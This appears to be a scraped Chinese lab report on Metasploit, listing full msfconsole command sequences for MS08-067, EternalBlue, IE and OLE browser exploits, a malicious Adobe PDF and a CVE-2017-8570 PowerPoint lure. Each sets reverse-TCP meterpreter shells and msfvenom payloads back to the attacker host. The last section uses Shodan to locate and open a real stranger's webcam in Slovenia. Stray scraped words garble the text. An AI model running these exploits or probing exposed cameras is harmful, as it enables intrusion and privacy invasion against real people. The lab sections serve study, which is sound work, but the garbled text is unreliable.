返回目录html
返回目录python
用本身的话解释什么是exploit
,payload
,encode
。linux
- exploit:利用漏洞,达到攻击控制受害机的一种手段
- payload:载荷,含有执行攻击的代码,来实现任何运行在受害者环境中的程序所能作的事情
- encode:对攻击代码进行假装,使其能正常运行并尽可能免杀
返回目录git
关于MSFgithub
渗透攻击模块(Exploit Modules)
、辅助模块(Auxiliary Modules)
、攻击载荷(Payload Modules)
、空字段模块(Nop Modules)
、编码模块(Encoders)
、后渗透攻击模块(Post)
/usr/share/metasploit-framework/modules
info
查看其信息,观察其要设置的信息(带yes的为须要设置的,如有默认值则不用 设)、能够攻击的靶机(target)msfconsole
启动:web
service postgresql start armitage
connect
、yes
search cve:2018 type:exploit platform:windows
(cve后为漏洞年份)help search
查看命令格式攻击浏览器,获取系统控制权sql
use exploit/windows/browser/ie_setmousecapture_uaf info 设置参数 payload options exploit 上钩后 use auxiliray/server/browser_autopwn
攻击Adobe Readershell
use exploit/windows/fileformat/adobe_cooltype_sing info search type:exploit name:Excel platform:windows
返回目录windows
攻击方:kali
10.0.0.217
靶机:Win2kServer_SP0_target10.0.0.112
api
ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击者利用受害者主机默认开放的SMB服务端口445,发送恶意资料到这个端口,经过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓存区,得到远程代码执行权限,从而彻底控制主机。
Hosts
-Nmap Scan
-Quick Scan(OS detect)
(能够自动探测目标主机的操做系统)Services
,查看靶机上开启的服务,有以下服务:Scan
(Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步肯定攻击方法提供参考依据)Attacks
-Find Attacks
,Armitage会自动寻找合适的攻击模块,结束会出现下图Attack
-smb
-check exploits
检测哪些漏洞是存在的Attack
-smb
-ms08_067_netapi
自动攻击,设置端口为5330
,标记Use a reverse connection
,点击Launch
下面咱们进入console
手动换一种payload
use exploit/windows/smb/ms08_067_netapi //选择攻击模块 set payload generic/shell_reverse_tcp //选择攻击载荷 show options //查看配置信息 show targets //查看可攻击的平台 set RHOST 10.0.0.112 //设置靶机IP,端口默认为445 set LPORT 5330 //成功后回连主机端口5330 set LHOST 10.0.0.217 //设置攻方IP set target 1 //这里为win2k(可经过“show targets”查看可攻击的平台) exploit //发起渗透攻击
shell 1
- interact
,先输入run
在输入dir
查看目录信息使用msfconsole
效果以下
攻击方:
kali 10.0.0.138
靶机:Windows7 x64 10.0.0.216
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞致使攻击者在目标系统上能够执行任意代码。(SMB服务的做用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让二者的资源可互通有无。)
msfconsole
经过search MS17_010 platform:windows
查看其可用模块,咱们选择第一个exploit/windows/smb/ms17_010_eternalblue
输入如下命令
use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块 show payloads //显示可用攻击载荷 set payload windows/x64/meterpreter/reverse_tcp //设置tcp反向链接 info //查看须要配置的信息及可攻击的target set RHOST 10.0.0.216 //设置靶机IP set LHOST 10.0.0.138 //kali IP set LPORT 5330 //设置攻击端口 set target 0 //设置win7靶机 exploit //发起渗透攻击
查看IP验证在继续后面的命令操做
攻击方:
kali 10.0.0.138
靶机:Windows7 x64 10.0.0.216
浏览器:IE 8.0
kali中输入msfconsole
进入控制台,依次输入如下指令
use windows/browser/ms11_050_mshtml_cobjectelement //选择攻击模块 set payload windows/meterpreter/reverse_http //设置http反向链接 set SRVHOST 10.0.0.138 //设置靶机要回连的IP地址 set LHOST 10.0.0.138 //kali IP set LPORT 5330 //设置攻击端口 set URIPATH 20165330zyx //统一资源标识符路径设置 exploit //发起渗透攻击
http://10.0.0.138:8080/20165330zyx
,IE出现警告弹窗,提示关闭程序msfconsole
这边,没啥反应工具
-Internet选项
,修改以下安全设置在进到地址,这回提示运行不正常的加载项或恶意加载项致使 Internet Explorer 关闭此网页
攻击方:
kali 10.0.0.138
靶机:WindowsXP 10.0.0.171
浏览器:IE 8.0
此安全更新可解决 Microsoft Windows 对象连接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时容许远程执行代码。成功利用这些漏洞的攻击者能够在当前用户的上下文中运行任意代码。若是当前用户使用管理用户权限登陆,则攻击者可随后安装程序;查看、更改或删除数据;或者建立拥有彻底用户权限的新账户。远程攻击者利用此漏洞经过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本。
msfconsole
经过search ms14_064 platform:windows
查看可选攻击模块,这里选用exploit/windows/browser/ms14_064_ole_code_execution
执行如下命令
use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块 show payloads //显示可用攻击载荷 set payload windows/meterpreter/reverse_tcp //设置tcp反向链接 info //查看详细信息(发现可攻击winXP和win7) set SRVHOST 10.0.0.138 //设置攻方IP set AllowPowerShellPrompt true //由于msf中自带的漏洞利用exp调用的是 powershell。 因此msf中的exp代码只对安装powershell的系统生效 set LHOST 10.0.0.138 set LPORT 5330 set target 0 //设置winXP靶机 exploit //发起渗透攻击
此时能够用ctrl+c
退出当前状态,经过输入sessions -i 1
获取第一个会话链接,并输入ipconfig
验证是否为靶机地址
攻击方:
kali 10.0.0.138
靶机:WindowsXP 10.0.0.171
Adobe Reader:9.3.0
kali输入msfconsole
进入控制台,依次输入如下命令
use windows/fileformat/adobe_cooltype_sing //选择攻击模块 set payload windows/meterpreter/reverse_tcp //设置tcp反向链接 set LHOST 10.0.0.138 //kali IP set LPORT 5330 //设置攻击端口 set FILENAME 5330.pdf //设置生成的pdf文件名 exploit //发起攻击此时生成
5330.pdf
,咱们进入保存目录cd /root/.msf4/local
,输入cp 5330.pdf /mnt/hgfs/vm
复制到共享文件夹中,在移到windowsXP虚拟机中控制台中输入back
退出当前模块,输入如下命令进入监听模块:
use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/reverse_tcp //设置tcp反向链接 set LHOST 10.0.0.138 //kali IP set LPORT 5330 //设置攻击端口 exploit //监听
ipconfig
确认是否会连正确发现无误,就能够继续后续的命令操做了
攻击方:
kali 10.0.0.138
靶机:WindowsXP 10.0.0.216
Microsoft Office:2016 (64-bit edition)
- 2017年7月,微软在例行的月度补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞,利用方法简单。网上已经出现该漏洞的利用代码,影响范围较广。
- 该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化Script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者能够欺骗用户运行含有该漏洞的PPT文件,致使获取和当前登陆用户相同的代码执行权限。
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.0.138/logo.doc
(IP为攻方IP)No such file or directory: 'template/template.ppsx'
,只要在里面建立文件夹template
,将template.ppsx
挪到template
里便可成功。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.138 LPORT=5330 -f exe > shell.exe
(由于个人win7为64位命令中须要加入x64,IP为攻方IP)python cve-2017-8570_toolkit.py -M exp -e http://10.0.0.138/shell.exe -l shell.exe
进入msfconsole
监听
use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.138 set LPORT 5330 exploit
Invoice.ppsx
传至安装有Microsoft Office 2016的win7上,并打开该文件发现回连成功
msfconsole
中可经过命令show auxiliary
查看全部的辅助模块gather/shodan_search
,使用shodan来搜索网络摄像头shodan
use auxiliary/gather/shodan_search
show options
set SHODAN_APIKEY tPZf7UpklnPZ*********JFz567WYbt
set QUERY "webcamXP"
run
[*] Auxiliary module execution completed
显示IP:Port
,复制到浏览器中看看可不能够看到画面(选了一个Slovenia斯洛文尼亚共和国地方的。。。总以为有点恐怖。。)参考资料